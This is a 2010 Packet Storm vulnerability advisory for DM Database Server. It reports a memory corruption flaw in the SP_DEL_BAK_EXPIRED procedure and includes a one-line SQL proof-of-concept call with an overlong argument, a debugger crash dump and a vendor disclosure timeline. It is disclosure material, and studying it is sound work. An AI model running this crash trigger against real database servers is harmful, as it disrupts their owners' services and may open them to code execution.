DM Database Server Memory Corruption

2010-06-02T00:00:00
ID PACKETSTORM:90138
Type packetstorm
Reporter Shennan Wang
Modified 2010-06-02T00:00:00

Description

                                        
                                            `DM Database Server Memory Corruption Vulnerability  
  
  
Vulnerable: All Version  
Vendor: www.dameng.com  
Discovered by: Shennan Wang (HuaweiSymantec SRT)  
  
  
Details:  
=========  
A vulnerability in DM Database Server all version allows attacker to execute arbitrary code or cause a DoS (Denial of   
  
Service).Authentication is required to exploit this vulnerability.  
  
The specific flaw exists within the SP_DEL_BAK_EXPIRED procedure.  
  
  
POC:   
=========  
CALL SP_DEL_BAK_EXPIRED('AAAAAAAAAAAAAAAAAAAA', '');  
  
  
  
(458.5fc): Access violation - code c0000005 (!!! second chance !!!)  
eax=00000000 ebx=02d3d430 ecx=ffffffff edx=074ecfd0 esi=074ed37c edi=0000041c  
eip=100d1753 esp=074eccec ebp=074ed1fc iopl=0 nv up ei pl zr na pe nc  
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246  
*** WARNING: Unable to verify checksum for C:\dmdbms\bin\wdm_dll.dll  
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\dmdbms\bin\wdm_dll.dll -   
wdm_dll+0xd1753:  
100d1753 f2ae repne scas byte ptr es:[edi]  
0:009> da ebp  
074ed1fc "AAAAAAAAAAAAAAAAAAAA"  
  
  
  
Timeline:  
========  
2010.04.17 Report to vendor,no response.  
2010.05.31 Public  
`